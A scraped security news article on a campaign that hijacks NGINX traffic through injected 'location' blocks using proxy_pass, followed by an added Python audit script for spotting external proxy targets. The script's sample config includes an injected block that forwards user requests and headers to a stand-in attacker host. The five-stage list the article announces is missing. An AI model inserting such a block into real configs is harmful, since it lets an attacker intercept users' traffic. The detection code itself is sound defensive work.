Article Details
Scrape Timestamp (UTC): 2026-02-04 23:27:46.527
Original Article Text
Hackers compromise NGINX servers to redirect user traffic.

A threat actor is compromising NGINX servers in a campaign that hijacks user traffic and reroutes it through the attacker's backend infrastructure.

NGINX is open-source software for web traffic management. It intermediates connections between users and servers and is employed for web serving, load balancing, caching, and reverse proxying.

The malicious campaign, discovered by researchers at DataDog Security Labs, targets NGINX installations and Baota hosting management panels used by sites with Asian top-level domains (.in, .id, .pe, .bd, and .th) and government and educational sites (.edu and .gov).

Attackers modify existing NGINX configuration files by injecting malicious 'location' blocks that capture incoming requests on attacker-selected URL paths. The captured requests are then rewritten to include the full original URL and forwarded via the 'proxy_pass' directive to attacker-controlled domains.

The abused directive is normally used for load balancing, allowing NGINX to reroute requests through alternative backend server groups to improve performance or reliability; hence, its abuse does not trigger any security alerts.

Request headers such as 'Host', 'X-Real-IP', 'User-Agent', and 'Referer' are preserved to make the traffic appear legitimate.

The attack uses a scripted multi-stage toolkit to perform the NGINX configuration injections. The toolkit operates in five stages:

These attacks are hard to detect because they do not exploit an NGINX vulnerability; instead, they hide malicious instructions in its configuration files, which are rarely scrutinized. Also, user traffic still reaches the intended destination, often directly, so the detour through attacker infrastructure is unlikely to be noticed unless specific monitoring is in place.
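Because the abuse lives in configuration rather than in an NGINX vulnerability, the practical check is to audit the config itself. The following Python audit is an added example, not code from the article or from DataDog Security Labs: it walks NGINX config text, collects every 'location' block, and flags any whose 'proxy_pass' target is neither a loopback address nor an 'upstream' declared in the same config. The sample config, the '/example-path' location and the 'attacker.invalid' domain are constructed placeholders.

```python
import re
from urllib.parse import urlsplit

# Constructed sample nginx.conf: one legitimate reverse-proxy block and one
# injected block of the kind described in the article. The attacker host is
# a placeholder in the reserved .invalid TLD, not a real indicator.
SAMPLE_CONF = """
upstream app_backend { server 127.0.0.1:8080; }
server {
    listen 80;
    location / {
        proxy_pass http://app_backend;
        proxy_set_header Host $host;
    }
    location /example-path {
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
        proxy_pass http://attacker.invalid/$scheme://$host$request_uri;
    }
}
"""

LOCAL_HOSTS = {"127.0.0.1", "localhost", "::1"}

def _blocks(text, name):
    """Yield (header, body) for every `name ... { ... }` block, honouring nesting."""
    for m in re.finditer(r"\b%s\b([^{;]*)\{" % name, text):
        depth, i = 1, m.end()
        while depth and i < len(text):
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        yield m.group(1).strip(), text[m.end():i - 1]

def suspicious_proxy_locations(conf_text):
    """Return (location, proxy_pass target) pairs whose target host is neither
    loopback nor an upstream declared in this config. Targets built purely
    from variables (e.g. http://$backend) have no static host and are skipped."""
    upstreams = {hdr for hdr, _ in _blocks(conf_text, "upstream")}
    findings = []
    for path, body in _blocks(conf_text, "location"):
        for target in re.findall(r"proxy_pass\s+(\S+?)\s*;", body):
            host = urlsplit(target.split("$")[0]).hostname or ""
            if host and host not in upstreams and host not in LOCAL_HOSTS:
                findings.append((path, target))
    return findings

if __name__ == "__main__":
    for path, target in suspicious_proxy_locations(SAMPLE_CONF):
        print(f"external proxy_pass in location {path}: {target}")
```

Run it against the real files under /etc/nginx (including anything pulled in by 'include') and treat each finding as a candidate for manual review rather than a verdict, since legitimate configs may proxy to external hosts on purpose.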
Daily Brief Summary
DataDog Security Labs discovered a cyber campaign targeting NGINX servers, redirecting user traffic through attacker-controlled infrastructure, primarily affecting Asian domains and government and educational sites.
Attackers manipulate NGINX configuration files by injecting malicious 'location' blocks, rerouting traffic via the 'proxy_pass' directive to domains under their control.
The campaign exploits the legitimate use of the 'proxy_pass' directive for load balancing, making detection challenging as it does not trigger typical security alerts.
A scripted multi-stage toolkit is employed to inject the malicious configurations, making these attacks difficult to detect without specific monitoring.
Traffic appears legitimate as request headers are preserved, allowing user traffic to reach intended destinations, complicating detection further.
Organizations using NGINX, especially those in targeted regions, should enhance monitoring of configuration files and implement robust security measures to detect such manipulations.
This incident underscores the need for continuous monitoring and auditing of server configurations to prevent unauthorized modifications.